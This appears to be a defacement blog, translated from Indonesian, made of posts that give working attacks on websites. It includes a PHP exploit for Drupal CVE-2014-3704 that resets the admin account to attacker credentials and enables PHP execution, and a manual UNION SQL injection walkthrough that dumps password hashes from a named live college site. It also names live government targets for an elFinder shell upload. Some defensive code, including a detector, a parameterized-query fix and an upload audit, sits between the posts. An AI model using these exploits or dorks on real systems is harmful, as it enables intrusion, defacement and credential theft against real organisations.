
Thursday, 12 September 2019

Deface Method: Drupal 7.x SQL Injection + Shell Upload

Hi guys, welcome back :v
This time it's a tutorial for sites that use the CMS
Drupal 7.x: SQL Injection + Shell Upload
What you need:
- Shell C99
- Dork
- Coffee
Dork : intext:"powered by drupal" site:id
inurl: Powered by Drupal
inurl:"node/add/article" site:id
( Come up with more of your own )
You can grab the Drupal script below, save it ( php ), and upload it to your localhost or to a site where you have already uploaded a shell.
Grab it, bro.
<?php ?>  <!Doctype HTML>
<html>
<head>
<title>Drupal Exploit by ./Fell Ganns</title>
<body>
</head>
<body>
<div class="mymargin">
<center>
<font color="red"><h1>Drupal Exploit Sql Injection + Upload Shell by ./Fell Ganns</h1></font>

<form method="GET" action="">
Site : <input type="text" name="url" placeholder="Example: www.site.com">
<input type="submit" name="submit" value="suck it !">
</form>
<br>
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
$file = fopen("rock-you.txt", "a");
error_reporting(0);
if (isset($_GET['submit'])) {
    $url = "http://" . $_GET['url'];
    $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
    $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
    $ctx = stream_context_create($params);
    $data = file_get_contents($url . '/user/login/', null, $ctx);
    echo "<h4>Scanning at \"/user/login/</h4>\"";
    if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
        $fp = fopen("rock-you.txt", 'a');
        echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
        echo '<font color="#00FF66">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock You </a></font> ';
        fwrite($fp, "Succes! User:fuckyou Pass:admin -> {$url}/user/login");
        fwrite($fp, "
");
        fwrite($fp, "======================================Donnazmi==============================================================");
        fwrite($fp, "
");
        fclose($fp);
    } else {
        echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
    }
}
if (isset($_GET['submit'])) {
    $url = "http://" . $_GET['url'] . "/";
    $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
    $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
    $ctx = stream_context_create($params);
    $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
    echo "<h4>Scanning at \"Index</h4>\"";
    if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
        $fp = fopen("rock-you.txt", 'a');
        echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
        echo '<font color="red">Finished scanning. check =>  </font><a href="rock-you.txt" target="_blank">Rock you !</a></font> ';
        fwrite($fp, "Success! User:fuckyou Pass:admin -> {$url}/user/login");
        fwrite($fp, "
");
        fwrite($fp, "======================================Donnazmi==============================================================");
        fwrite($fp, "
");
        fclose($fp);
    } else {
        echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
    }
}
?>
<br>
</div>

</body>
</html>

Open it; if the site turns out to be vulnerable, it sets up the login.
Then just click through to the site: https://kntl.com/user/login
and log in with the username: fuckyou
Password: admin
Once you are logged in, go to https://kntl.com/node/add/article
And choose php, then Save
Boom :v Now you can do whatever you like with it. Just have fun 😁
Okay, that's all. Bye
Next To 😀
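
For defenders, an added example (not part of the original post or its script): the request built above carries SQL inside the array index of the name form field, so a POST body whose bracketed index holds anything other than identifier characters is a strong indicator of this attack. The function names, the allow-list pattern and the sample requests are assumptions constructed here; sites on the versions named in the script header (prior to 7.32) need the upgrade.

```python
import re
from urllib.parse import unquote_plus

# Indexes Drupal forms generate themselves: numeric deltas, field or language names.
SAFE_INDEX = re.compile(r"[A-Za-z0-9_-]*")
BRACKET = re.compile(r"\[([^\]]*)\]")

def suspicious_keys(body: str) -> list[str]:
    """Return form keys whose array index is not a plain identifier."""
    flagged = []
    # Split on '&' only: these bodies can carry a raw ';' inside a key.
    for pair in body.split("&"):
        key = unquote_plus(pair.partition("=")[0])
        # A raw '=' inside the index truncates the key and leaves '[' unclosed.
        unbalanced = key.count("[") != key.count("]")
        bad_index = any(not SAFE_INDEX.fullmatch(ix) for ix in BRACKET.findall(key))
        if unbalanced or bad_index:
            flagged.append(key)
    return flagged

def scan(requests: list[tuple[str, str, str]]) -> list[tuple[str, str, list[str]]]:
    """Return (client, path, flagged keys) for every request with a hit."""
    hits = []
    for client, path, body in requests:
        keys = suspicious_keys(body)
        if keys:
            hits.append((client, path, keys))
    return hits

# Constructed sample requests (documentation addresses, harmless SQL).
SAMPLE = [
    ("198.51.100.7", "/user/login", "name=alice&pass=x&form_id=user_login"),
    ("203.0.113.9", "/user/login",
     "name[0%3Bselect+1%3B%23]=a&name[]=b&pass=x&form_id=user_login"),
    ("203.0.113.9", "/?q=node&destination=node",
     "name[0;select 1 = 1;#]=a&name[]=b&form_id=user_login_block"),
    ("198.51.100.8", "/node/add/article", "field_tags[und]=news&title=Hi"),
]

if __name__ == "__main__":
    for client, path, keys in scan(SAMPLE):
        print(client, path, keys)
```
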

Sunday, 08 September 2019

Deface Method: SQL Injection ( Manual )

Hi, Assalamualaikum Wr. Wb.
Welcome back, pigs :v This time it's a tutorial on defacing with manual SQL injection. Okay, let's get going, it's late and I want to sleep :v
- Dork
- Cigarettes
- Coffee
Dork : inurl:news.php?id= site:
inurl:gallery.php?id= site:
inurl:index.php?id= site:
( Come up with more of your own )
Live Target : http://www.maldacollege.ac.in/current-news.php?id=35

First, put a ' at the end, like this
http://www.maldacollege.ac.in/current-news.php?id=35'

Keep going until you get an error :v
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+1-- <- No error
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+2-- <- No error
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+3-- <- No error
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+4-- <- No error
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+5-- <- Error

That means the column count is 4
The next step is union+select
http://www.maldacollege.ac.in/current-news.php?id=35+union+select1,2,3,4--
After that, @@version or version() to see which version the SQL server is
The "lottery number" is 5 thousand :v Okay, moving on
After that, put group_concat(table_name) in the number that showed up earlier, and

the clause +from+information_schema.tables+where+table_schema=database()--

after the last number, so it looks like this
http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
Okay, next: lots of tables show up there :v The next stage is to convert the name of the table you want to dump. Here I want to dump user_details; once converted, its hex value is 757365725f64657461696c73
Not sure how to convert it? Do it here: http://string-functions.com/string-hex.aspx
Okay, now group_concat(column_name) <where it said table before, change it to column, and after the last number add

from+information_schema.columns+where+table_name=0x[the result you converted earlier]--

don't forget to use 0x << that
+from+[the name you dumped earlier]-- <- after the last number it ends up like that
http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,concat_ws(0x3a,user_name,user_password),3,4+from+user_details--
Out come the usernames and passwords, pigs. All that's left is to work out the hashes yourselves. The login? It's visible right there, hehe
Okay, bye, that's all for now
Goodbye, Next To 😁
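
The fix for the flaw this walkthrough depends on, as an added example that is not part of the original post: the id parameter reaches the SQL text unmodified, which is what lets ORDER BY and UNION SELECT reshape the query. The sketch uses Python's sqlite3 with a constructed 4-column news table and user_details table (all names, data and function names are assumptions) and puts the concatenated query beside the validated, parameterized one.

```python
import re
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a 4-column news page and a user table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, posted TEXT);
        CREATE TABLE user_details (user_name TEXT, user_password TEXT);
        INSERT INTO news VALUES (35, 'Exam schedule', 'Details inside', '2019-09-01');
        INSERT INTO user_details VALUES ('admin', 'constructed-hash-value');
    """)
    return db

QUERY = "SELECT id, title, body, posted FROM news WHERE id = "

def fetch_news_vulnerable(db: sqlite3.Connection, raw_id: str) -> list[tuple]:
    # The parameter is pasted into the SQL text, so the database parses it as SQL.
    return db.execute(QUERY + raw_id).fetchall()

def fetch_news_safe(db: sqlite3.Connection, raw_id: str) -> list[tuple]:
    # Accept only a short run of ASCII digits, then bind the value as data.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return []
    return db.execute(QUERY + "?", (int(raw_id),)).fetchall()

# Same shape as the request in the post, in SQLite syntax (constructed input).
PROBE = "-35 UNION SELECT 1, user_name || ':' || user_password, 3, 4 FROM user_details--"

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", fetch_news_vulnerable(db, PROBE))
    print("parameterized:", fetch_news_safe(db, PROBE))
    print("normal id    :", fetch_news_safe(db, "35"))
```
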

Thursday, 05 September 2019

Website Bug on Gojek.com

Hi guys, back again
This time it's a website bug on Indonesia's biggest transportation website, namely ( gojek.com )
This bug is quite dangerous: attackers may be able to upload their own files or their shells
GoJek Website Bug


#- Title: GoJek Website Bug
#- Author: Not confirmed
#- Published : 7-7-2018
#- Developer : Team Go-Jek
#- Fixed in Version : -
#- Tested on : windows

========================================================================

Proof Of Concept
Gojek has a security bug on its website
Namely the Elfinder 2.0 - FileManager for web ( rc1 ) File Upload Vulnerability
.php .html .phtml .jpg .gif.

Quite a big bug, right
Sure enough, here we can upload our own files

Same as the Elfinder v 2.0 shell upload deface method
inurl:/elfinder/elfinder.php.html
inurl:/elfinder v 2.0 ext:phtml
inurl:/elfinder/files/
( Come up with more of your own )
Exploit :
http://site.com/[path]/elfinder/elfinder.html
http://site.com/[path]/elfinder/elfinder.php.html
http://site.com/[path]/elfinder/src/elfinder-src.php.html
Live Target : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder.phtml

There you upload your file? Or your shell, whatever you like, hehe
Okay, that's all
Bye, Next To 😁
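
An audit a site owner can run over a file manager's upload directory, as an added example that is not part of the original post: it flags every file that the extension list above suggests could run as PHP, including double extensions and image files that carry a PHP open tag. The function name, the extension pattern and the sniff size are assumptions made for this sketch.

```python
import os
import re

# Extensions commonly mapped to the PHP handler. A match anywhere in the name
# counts, because some server configs run "name.php.html" by its inner extension.
PHP_EXT = re.compile(r"\.(php[0-9]?|phtml|phar)(\.|$)", re.IGNORECASE)
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)

def audit_upload_dir(root: str, sniff_bytes: int = 4096) -> dict[str, str]:
    """Map relative path -> reason for every file that could run as PHP."""
    findings = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            rel = os.path.relpath(path, root)
            if PHP_EXT.search(name):
                findings[rel] = "php-handled extension"
                continue
            try:
                with open(path, "rb") as fh:
                    head = fh.read(sniff_bytes)
            except OSError:
                continue  # unreadable file: skip it, keep auditing the rest
            # Image header followed by PHP code: the name looks harmless,
            # but the content executes if the file is ever included or renamed.
            if PHP_TAG.search(head):
                findings[rel] = "php open tag in content"
    return findings

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, reason in sorted(audit_upload_dir(target).items()):
        print(f"{reason:26} {rel}")
```
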

Mantan PHP Backdoor

Welcome back, bro. This time it's a tutorial on how to jump to other, hidden websites on the same server. You know how it goes when you've just uploaded a shell and then...